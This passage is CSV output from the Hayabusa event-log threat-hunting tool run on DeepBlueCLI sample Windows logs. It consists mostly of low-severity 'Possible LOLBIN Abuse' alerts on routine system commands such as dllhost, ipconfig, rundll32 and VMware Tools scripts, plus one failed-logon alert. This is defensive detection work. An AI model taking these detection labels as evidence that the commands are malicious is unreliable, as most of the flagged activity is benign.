0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:47:30.057 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:47:31.026 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:47:31.073 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:47:46.745 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 
06:12:04.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 06:12:28.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 06:12:41.946 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 06:13:05.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:20.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:20.640 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:22.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:35.890 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:06.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:06.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:07.144 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:07.801 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:11.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:03:25.629 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 01:06:05.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 03:14:25.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 03:14:25.546 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 03:14:25.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 03:16:25.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 04:31:04.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:05:57.675 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac 
| User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:05:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:06:13.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:06:19.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:06:38.077 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:06:38.083 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:00:11.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:00:12.103 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:00:12.141 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:00:33.844 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 
06:03:11.036 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:03:11.056 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:10:05.018 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:10:05.024 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:42:10.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:42:10.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:42:10.669 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:42:29.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:11.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:13.000 +09:00,IE10Win7,6006,info,,Event Log Service 
Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:45:29.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:30.140 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:43.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:43.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:45.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:46.517 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:47.330 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:58:44.730 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 
07:00:01.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:00:01.685 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:24:56.194 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.163 